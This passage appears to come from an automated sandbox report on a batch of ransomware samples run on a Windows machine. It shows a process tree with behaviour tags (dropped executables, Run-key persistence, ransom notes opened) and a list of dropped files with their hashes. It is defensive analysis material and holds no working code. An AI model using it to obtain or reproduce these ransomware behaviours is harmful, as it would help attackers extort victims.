                    5⤵
                    • Program crash
                    PID:5608
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
                Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:5892
                • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
                  Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe
                  4⤵
                  • Executes dropped EXE
                  PID:6128
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe
                Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe
                3⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:6072
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe
                Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:6876
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 472
                  4⤵
                  • Program crash
                  PID:6920
              • C:\Users\Admin\Desktop\00403\UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe
                UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:6448
                • C:\Users\Admin\AppData\Local\Temp\497D8E.exe
                  C:\Users\Admin\AppData\Local\Temp\497D8E.exe
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  PID:6948
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1704
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3448 -ip 3448
            1⤵
              PID:1192
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4292 -ip 4292
              1⤵
                PID:276
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6876 -ip 6876
                1⤵
                  PID:256
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4292 -ip 4292
                  1⤵
                    PID:6652
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1824 -ip 1824
                    1⤵
                      PID:6096
                    • C:\Windows\system32\NOTEPAD.EXE
                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\readme.txt
                      1⤵
                      • Opens file in notepad (likely ransom note)
                      PID:1008
                    • C:\Windows\system32\OpenWith.exe
                      C:\Windows\system32\OpenWith.exe -Embedding
                      1⤵
                      • Modifies registry class
                      • Suspicious use of SetWindowsHookEx
                      PID:6524
                    • C:\Windows\system32\NOTEPAD.EXE
                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.d96d1f6d.TXT
                      1⤵
                      • Opens file in notepad (likely ransom note)
                      PID:5664
                    • C:\Windows\system32\wbengine.exe
                      "C:\Windows\system32\wbengine.exe"
                      1⤵
                        PID:3592
                      • C:\Windows\System32\vdsldr.exe
                        C:\Windows\System32\vdsldr.exe -Embedding
                        1⤵
                          PID:1160
                        • C:\Windows\System32\vds.exe
                          C:\Windows\System32\vds.exe
                          1⤵
                          • Checks SCSI registry key(s)
                          PID:7264
                        • C:\Windows\system32\OpenWith.exe
                          C:\Windows\system32\OpenWith.exe -Embedding
                          1⤵
                          • Modifies registry class
                          • Suspicious behavior: GetForegroundWindowSpam
                          • Suspicious use of SetWindowsHookEx
                          PID:7356
                          • C:\Windows\system32\NOTEPAD.EXE
                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\Readme.README
                            2⤵
                            • Opens file in notepad (likely ransom note)
                            PID:5084
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x41c 0x3f8
                          1⤵
                            PID:6148
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:6552

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\MicrosoftEdgeUpdate.exe.DEMON

                              Filesize

                              209KB

                              MD5

                              d233eef438a2a99e1438fba6e6461043

                              SHA1

                              d9cc485124a1fbb8c5cad3a096b2113d3780baf3

                              SHA256

                              ada7349b9242d8c1ec6cc7f4d7c8b17d6a2d9d6c1bb160bd3998ededa3900251

                              SHA512

                              dd496880361c9c68e770c09285f7b60e938a32f10d4bb03536169690623b2b657ae43fc9219982d50d5bb856ca66636380b98375101502b41c825ab18d533bba

                            • C:\Program Files (x86)\readme.txt

                              Filesize

                              1KB

                              MD5

                              65b045a29c11fd41c72a74a784081bdc

                              SHA1

                              20d7079bc7c6262f3b4a56220e30285101c1fc5d

                              SHA256

                              2ecc0df9b581b25f9072d51160a6c4b983dc88de1da5e752cc5266ee26cacf42

                              SHA512

                              d6f7ce54e86636adb1e2fd6904732709762a043318bc9d3c32341d629c408a630741916008a01596636d2ab3d2115859483ec92e957693e28fc281f76f0e5bfe

                            • C:\Program Files\Crashpad\attachments\Restore-My-Files.txt

                              Filesize

                              1KB

                              MD5

                              58ffaabd4f02822cf0d7a36b6f7cf663

                              SHA1

                              38c18f4c095442890df757f95f7a37ec4b49b055

                              SHA256

                              9f7d47d0a58eb2d21610091ecd6a7df85d67f9d1600d889407b19a7610b74f62

                              SHA512

                              71f0ee6c292f07247110f1014c489ecf24d14ea353442b26f4a14752a606350fe6c6939bb0b902a88b8728d077efe07f52a08d23a518ff95d8099f954f6e5d5f

                            • C:\Recovery\README.d96d1f6d.TXT

                              Filesize

                              2KB

                              MD5

                              25d0b19a0ec34a39dfa3e177866f01a3

                              SHA1

                              a3704d1f6499738ccd694bdd6008a850c6b2e453

                              SHA256

                              f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8

                              SHA512

                              ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

                            • C:\Updates\ZTH.bat

                              Filesize

                              153B

                              MD5

                              9542b61a1b1a67deb6f5608395efd465

                              SHA1

                              74158ed4ee52a7001a9831f80cd3ef60c081679a

                              SHA256

                              2fb0e6d5f7bab7d4446b8701d608cdec83cbada4f7d7e8c6ab43f5915a42742c

                              SHA512

                              e2c1cbb8b8176257296593a5b72ddc22d6009f0e4c7c8c2ecce2faa234f0882e7b4d001c834a6d5846cced03fdc57da16294a5e6f73b8541cce9c805d204e41d

                            • C:\Updates\h.vbs

                              Filesize

                              78B

                              MD5

                              c578d9653b22800c3eb6b6a51219bbb8

                              SHA1

                              a97aa251901bbe179a48dbc7a0c1872e163b1f2d

                              SHA256

                              20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2

                              SHA512

                              3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                              Filesize

                              64KB

                              MD5

                              d2fb266b97caff2086bf0fa74eddb6b2

                              SHA1

                              2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                              SHA256

                              b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                              SHA512

                              c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                              Filesize

                              4B

                              MD5

                              f49655f856acb8884cc0ace29216f511

                              SHA1

                              cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                              SHA256

                              7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                              SHA512

                              599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                              Filesize

                              944B

                              MD5

                              6bd369f7c74a28194c991ed1404da30f

                              SHA1

                              0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                              SHA256

                              878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                              SHA512

                              8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                            • C:\Users\Admin\AppData\Local\Temp\497D8E.exe

                              Filesize

                              212KB

                              MD5

                              2f2e7ef471eb0c5785552b4e4476eddc

                              SHA1

                              bbeea16734e19f3fd081391612af51112f107d13

                              SHA256

                              63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be

                              SHA512

                              d5414eb8b3ee49a00c9db617e20e16bb3058e449a1538df5e0ad61c5a935a95e9f25d52f93b79b5e783b5c404f9164de859ac76690ec00f50696fcb2a54b1221

                            • C:\Users\Admin\AppData\Local\Temp\CyberPunk2077.sfx.exe

                              Filesize

                              9.9MB

                              MD5

                              f65b6e5c80643e85771e1b050cce51f3

                              SHA1

                              e9d6ec45859868fda152fd19a0c977a439be40fa

                              SHA256

                              7e946b53dd48fc7d42a8812ab0450e1193ae21ee9990d812811224c3429ecfc5

                              SHA512

                              63d3fb8b157c30fc155feedf01ba7f141e7251d9a424e056b8f6798ee1238dc6c5834938940c3fd445ed9c22a53841f389f3d553c6b53e52285030751e120c53

                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe

                              Filesize

                              9.9MB

                              MD5

                              9bb3e77f3a2b7329ca41979a783996ae

                              SHA1

                              fb4d3e1fe06bab2bb9255f18b1e8e079fbf6de06

                              SHA256

                              08124c7d2c97ffd108f1b7c9bba86aaeff5a41d16c77fcf11b3a8c9504f93424

                              SHA512

                              d1c4567034e479956c43660c4553d8aff2242dae7c414900747cdb0d59ace891bdf5774474e8509a8c33291dbf13561bfadd4758d77d2f60ae8e9cb262a08bf1

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\VCRUNTIME140.dll

                              Filesize

                              81KB

                              MD5

                              aeab74db6bc6c914997f1a8a9ff013ec

                              SHA1

                              6b717f23227d158d6aa566498c438b8f305a29b5

                              SHA256

                              18ccb2dd8af853f4e6221bb5513e3154ef67ae61cee6ec319a8a97615987dc4b

                              SHA512

                              a2832b7720599361e2537f79a2597acb1a2d5633fdfe20a0d1075e9457683fdb1d5676d121c0bf1a825ff99512dcd924254f1151b50aae922acc0cc10f461036

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_bz2.pyd

                              Filesize

                              71KB

                              MD5

                              2bb3496c855e5f9f14005e36525f9ed7

                              SHA1

                              a09598372eb8b825e762fc7c18b75c8ad6a70568

                              SHA256

                              b4995be5f03dce5bf0443bfae4cf8cb2ec5b16ae3bb078333123927323aa0dca

                              SHA512

                              d06d83683524c082886fe3fa5269ea1c9ec0c61d6835a9dde2b91d6bcbb02fa2bf0c2936c1f3c99a3ba741d7c688c1c3727b8a2a6fef03d8d5c00c3b448f2a68

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_cffi_backend.cp36-win32.pyd

                              Filesize

                              143KB

                              MD5

                              ea3d64b8cebcbcc84e230733824d83ee

                              SHA1

                              e59e4e9353b8d282e022ac0f5ecfaabdb6b91d24

                              SHA256

                              1baaaede2f7324b31f67f3d3ec98982c75a5438a1e83a5ddb6dd14d9fcf8e768

                              SHA512

                              03d08fd9b66eced2668b6fc83b1c7778b6689a504ccb93ec912935303595035138bf30aec95cada8b502833234c60f52fb65487843717e6d231fcc04217dbe82

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_ctypes.pyd

                              Filesize

                              104KB

                              MD5

                              17bce334e63161d93954596cab85ce93

                              SHA1

                              d9be6bf1b9b6415b12810ae3cdaac381746aac7a

                              SHA256

                              72187b58b87abab33c760fed3e1d295b8c6786e80490125cee138b424bc71e37

                              SHA512

                              98a915bbe67b6d5ce48f3d15135724a52d456ff1a0713da7b8febc24be7ea466e3405fec032212b1353e9675f2d044a7f13e514a5e4a1d82fa4905d7a2e7f262

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_hashlib.pyd

                              Filesize

                              1.1MB

                              MD5

                              c9f92d933589fe85deffb89ce3d08052

                              SHA1

                              f9349a85d4097cdd3c011c8b267921af3c9c6552

                              SHA256

                              a49b409b3ba4c6bce74fc5bf31ba53ba080b1a33cb83c92e5354b9164d030ea6

                              SHA512

                              87668439aa812f0a8672805039bf6667a1fa221435a1f5bf6c82fd66deeeb7d3ec2d33a04a45311cb50d59131f98c54d3624ed2cd5f269da69c62706808283e3

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_lzma.pyd

                              Filesize

                              180KB

                              MD5

                              d8ed156b7acacba7ae93f64cd3a6c488

                              SHA1

                              368ca96eb8d569b8f3cb70e4bbf6a427902fea32

                              SHA256

                              c68164809b0c27c93ebd87cbbb5f422463554cbc15b2b24ed86967947b11bf16

                              SHA512

                              107e66d42455e395fcdd032f0e5a2c555cd7cc435d5b3bc8fc213f02f3aab30f79b361e0df0b46b41d337249ef84a1b8ec3e3cfbce522ce00b1907d909447f97

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_socket.pyd

                              Filesize

                              61KB

                              MD5

                              070df20954306ae7c97b8a04390fdf47

                              SHA1

                              064bc619ba2985f913d6ccb871286fcfad5e61cd

                              SHA256

                              93cc376d376b374585d417a499d2ab8026a8b5bafa58632c2e1e09cdc4063461

                              SHA512

                              13273dc5067511a46f8b6ac4124a10e6f816420f6fbf231ef09c2557b76443a7e0489182c6ddc29bb6fdb482719cbcb9b4f592f3b135bb1d955caf16a9402484

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_ssl.pyd

                              Filesize

                              1.5MB

                              MD5

                              72802b72dd0d697f1fedb7d8a1e6cef3

                              SHA1

                              6df67366b8efa36e738b26a58ecd4168b09bcd16

                              SHA256

                              1d15049774b483f8b063aea48e95a66d2dfd4dbdf376b1fa971fc8646605857d

                              SHA512

                              9f2d4fa88a46895e4ff9e50e815ed0ab652c900b3a7f50e76ccf7d43b484c58dbc635d8be0fe2138c9e9965a672dfad8aa1481f1191a4c6cdce2cda0f1b74ce8

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\base_library.zip

                              Filesize

                              761KB

                              MD5

                              5ca73655bc3c1ddfa091c03ab6626b1d

                              SHA1

                              23aa306f7a06321f75e58bcd5f45361b6be9d6c8

                              SHA256

                              f3764218a7843bbda56c7df7cc2ee9462898f67e8bc97e498d4851e2f58ab977

                              SHA512

                              dc10b38b7117992e4db0116cdfed33b492ae5f6665d038524e2ce95609efb5b69a1230c62e43b2dfad26cfaf982e4772ed5470794c1764d25ade1219e8c65744

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\cryptography\hazmat\bindings\_openssl.pyd

                              Filesize

                              2.2MB

                              MD5

                              48aea2ba1df0ead97735a2907308ebe4

                              SHA1

                              18a06b41e94241ac686c8cd583c7b58cd743416f

                              SHA256

                              3d21f3fd38219ba59a9793662d843219fc708e0cff619b3a4063cf8b4b4662de

                              SHA512

                              b65d520f5652f639db555f99aa324c7a172172861e05f3e85563a56f10b4ab1094155e6e3580ff08254a885b8a434c7c53452402db47bd2731d9a17cd324c76b

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\cryptography\hazmat\bindings\_padding.pyd

                              Filesize

                              10KB

                              MD5

                              ce6bdab775a6469b676462fca5195cb8

                              SHA1

                              e373b3189d9d4231f961a0865d774217d9c4a1bc

                              SHA256

                              554e30c9fb50dcb48cb68064662c30e2fe8b48f9e4aad77e7c4f335ce3825f19

                              SHA512

                              d0262f2831e36583e609eefdb410a416df61aa8c8ee884326b418455d737a8ccc7745f8aa8c181e981e554f845daaff462cba3a94593ef31b83edb0c4509b254

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\python3.dll

                              Filesize

                              57KB

                              MD5

                              bac7dd23125b09f2909c25eb23e1f811

                              SHA1

                              2ef9a1f3d10399864c2ef63030ada29b8059c6f6

                              SHA256

                              8fad4082b691a9ef4191519175d1000fa44341e59a1a9db01f3df4ca3ede42c3

                              SHA512

                              95b6930a2add69c9f2b266680392b4948e7d04059074466f1fcd556a0cf09f464163cb5720409b80745e303c469c72edbd8b6036721f29b5601ed20d82b77688

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\python36.dll

                              Filesize

                              3.3MB

                              MD5

                              c5b23d73fd8e234125e271cf00090a14

                              SHA1

                              686963d9b782bf7ad60651668a1d93eeb09b79d1

                              SHA256

                              8b0ffa63d874192350552d99392785e14faf36e2e4c91db0830eeb3d8197c2f2

                              SHA512

                              f4847f02c742ad7e76098530ddfd21666695ce6be48e77ddee799e8f6b7a04079896f450ba78ab4926e629c1d32d38242a203ebfdbc90c096773d5153f86e9f6

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\pywintypes36.dll

                              Filesize

                              110KB

                              MD5

                              6b3210f989d523d133cda1ff8f9ff286

                              SHA1

                              ab642dfe42597d1fdebcf0a93589502faa3ae600

                              SHA256

                              37b7eb8e8895eca62c3eedb3ba4ef381f5f51aed894e1651a78186c39c5db191

                              SHA512

                              80272375aace4b00acec3c7279683725351f0b0a54bee54e6d265bcd13cbdf52c6561236b386dbde81e882f1723dfaad7f3d8c6546abcf7a54d95b4e8ffbc69b

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\select.pyd

                              Filesize

                              22KB

                              MD5

                              3e3b975dd01db8c4e1804e07656ed0f2

                              SHA1

                              f4f33520f9a9f084337a98672853587351726dfb

                              SHA256

                              97e0aa3d061f47faad6e8818cc4377d972edbeecd20791fd1de9786988224b11

                              SHA512

                              780fc536001d365681ca68229aac09a5eb8a7c0263641ad906222ed3306f359d0c1e5cc26d9a9373b9e7b925108292ce4c426f8442da0006333bb34dc9ebd343

                            • C:\Users\Admin\AppData\Local\Temp\_MEI47362\win32gui.pyd

                              Filesize

                              170KB

                              MD5

                              30865748c2848ec07115835a553b968c

                              SHA1

                              95c8fd6b2f685219670d2c85440fbbab9d6085ae

                              SHA256

                              220c04a51892082d70f2b7635f10a81b1a2d59fd22fbb0973b67bde193bb81b0

                              SHA512

                              beb6cdbf46bb117ad59cba42da89d011cd24962eeb93bb1f8359e255ee70657c26798358c97fa38fc434a8fbd3f691635a17a13e3ddce2b57b5b280be447834d

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xxd0olzv.cet.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Local\Temp\nsoCC5F.tmp\INetC.dll

                              Filesize

                              24KB

                              MD5

                              640bff73a5f8e37b202d911e4749b2e9

                              SHA1

                              9588dd7561ab7de3bca392b084bec91f3521c879

                              SHA256

                              c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502

                              SHA512

                              39c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe

                              Filesize

                              19.7MB

                              MD5

                              389be2d6eaa3936e971c41bb2cf418d9

                              SHA1

                              1035eb142fd54b1616edd266de6df02aedbbc8cc

                              SHA256

                              86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8

                              SHA512

                              573662105f6e04906024aa79418f578ce6715126a9347344917c094e7588c15a32e51fd2f319897d72a30272f04d0d5c3222061debedd2203d6c7cc012d90688

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe

                              Filesize

                              1.3MB

                              MD5

                              227f717e5c9da15f1f50d4fc4d6ec89f

                              SHA1

                              7462f5f72cf37a162694545a5c619c8fd46ee35a

                              SHA256

                              6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5

                              SHA512

                              05166162ccc55e4d757e00ed9f27c0de5a3fbdfb0eaa8fe532c8517c74923d301399f91c21bd4b4f5a2c192bc7ac8bf4c0a19753463194acb1b01105f0987639

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe

                              Filesize

                              3.9MB

                              MD5

                              4c39c19ba724b4cbd95fb99059b002af

                              SHA1

                              48611238def49b0e86de0ce4ba7c1bff7ab1e0ac

                              SHA256

                              02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795

                              SHA512

                              e7307f674d5699cc022ad528e1b417a52bf270fc4a2a92fb263faec7a9efb769ff3f32b861253ce5bfdb71d5cfcd280cd865392cb3639a29fde9d4eefc71c591

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe

                              Filesize

                              190KB

                              MD5

                              6da5a1163c3c8264134b3366521ef78a

                              SHA1

                              8dc13c56d1998ab44176361fb8f9389eca75f415

                              SHA256

                              5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251

                              SHA512

                              5ead53b33ac55e2e14d64c14d6009d96dd62e468ad20270ca6b44658f557b91778b6a52a6124a9133d8d25a4d8155666f935c1c88b4650f3fd6738d0da4e7818

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe

                              Filesize

                              97KB

                              MD5

                              b526084ac9ecb0e2071e178e7c642e29

                              SHA1

                              feec210f08423776ea4cd3ef07da9c1841f337b9

                              SHA256

                              20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043

                              SHA512

                              49ad8917cb1355027091d294fba08ecfdcd55f5cb71ee6257c4a05cd8ab0abe42402acb3c9a17fae8a6d47db56f49911010482c39f8dbd949550b0d3b9056d26

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe

                              Filesize

                              322KB

                              MD5

                              04cf403611bb7732bbf874a2ad70b799

                              SHA1

                              a514f5eb0498497ce2415d591f3ed12e43567e6f

                              SHA256

                              e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c

                              SHA512

                              2272750b5d8bcc36dc083eedb853d9f28dd361983264f471325488c5075370935a2e23adc859db74ee737af86c36c65ea49eebd80c51e119fdb2794cef97852b

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe

                              Filesize

                              504KB

                              MD5

                              e9454a2ff16897e177d8a11083850ec7

                              SHA1

                              6b6855931e69d27f5f2e2d828fbeb4db91688996

                              SHA256

                              e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead

                              SHA512

                              9bd01ed32887cecefe3987991f3ae3a0375c1cb1bff8b49f795b000076c26a1bb938476e4383b60a3f1ac5de79f7cd3cf2520ef695908815c0fee55a17dcb021

                            • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe

                              Filesize

                              356KB

                              MD5

                              7f5d465cca054e46bf406d73b60bb2b6

                              SHA1

                              ab74205e9f53e47098a5a2165d3e92804fd5c6d0

                              SHA256

                              898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05

                              SHA512

                              1cb2a266268076e5be028c1536632d11b146cf3e757859d8a9325ef5ac18fe2fdf383968b745a9757f7b32dd41888d7a8e536d23d9dc689bf5e71d3b99eb6961

                            • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe

                              Filesize

                              1.5MB

                              MD5

                              a96f370194c664573a6194cff2bffb48

                              SHA1

                              14ea97ae1fb39104870c322d293b8e188fbe8dd4

                              SHA256

                              ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f

                              SHA512

                              639c6e127668e7057263e6db7a7761711a52aaed082b1c0f863b8164248b124ad0b455f8fd86bc3d06fac0a68201695ee067c1e6789b3ae564edd93d874d8132

                            • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe

                              Filesize

                              7.9MB

                              MD5

                              44ae44b1318428dda1cb041167a58b84

                              SHA1

                              559c7628896672dc7dce4662ef4904dea2ff0c59

                              SHA256

                              815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad

                              SHA512

                              d84e0b501ec4ac93c21b87277eb63254ead4ea6faadcacecfb9abd564b34c2069b76a32d827fe4a52b7e83fc75c75847bd7bc8d321e48ff2c1265e2327d5fdc7

                            • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe

                              Filesize

                              6.5MB

                              MD5

                              2e171a12b837a11f66bc7a9319ab0088

                              SHA1

                              7e8a217af97b3df69fa64d594cd4200ff9d1994a

                              SHA256

                              b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81

                              SHA512

                              db55894dee3f1378b8463c82ab0c9e996c5760b6e5afe4b101511b33e9b59ce90a44aa0e27ed038941db54e777a6b6a0333f3eeda54b71c607c152d2ba03591c

                            • C:\Windows\WinSxS\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.19041.746_none_9d44fd61d4c8aeec\SecurityHealthSystray.exe

                              Filesize

                              84KB

                              MD5

                              0a06a969020bad81eb958b587b93811f

                              SHA1

                              17b242ff5c27c1c3c3593581745c7517094888de

                              SHA256

                              79c84cb3e45d68a5c390ef3dd2c9eb9d5d205ec097e08be7154a287714cc54a9

                              SHA512

                              45e7e79a4b467843fffedfd84b1674f355fbeb1f785252affa0b36a7802ca4ecb6d7307474ab676c1a44220266bd7e9befe49f866c2eab8cb3be80edc8516452

                            • C:\Windows\WinSxS\amd64_windows-shield-provider_31bf3856ad364e35_10.0.19041.84_none_9d98e005fb7852ca\FeatureToastBulldogImg.png

                              Filesize

                              43KB

                              MD5

                              f77c79b717217eb84b7051376c815d8a

                              SHA1

                              df23e628d3351c403c296d3a3169179de1e32490

                              SHA256

                              5cbfd6ba6581582caa3ef2772630b906665bee0ae1b9cd562c05da09d9023d88

                              SHA512

                              fe4f87e92b7f872cd4f2c767aea05a9804e8a6f053a58b1914d40de355af0ff05136b275feaeba12052b8b4fa27fb0b8e8008444b6656a4bb5718072974eea5d

                            • C:\Windows\WinSxS\amd64_windows-shield-provider_31bf3856ad364e35_10.0.19041.84_none_9d98e005fb7852ca\WindowsSecurityIcon.png

                              Filesize

                              816B

                              MD5

                              2551bd3743652c78c5f5934f76e9123d

                              SHA1

                              a3f8e082ba3aa17a715b6536091c60fa10d6dcd2

                              SHA256

                              75524589c798656b82c39a4ffc9536639442e09903013b01177b2723e29c643c

                              SHA512

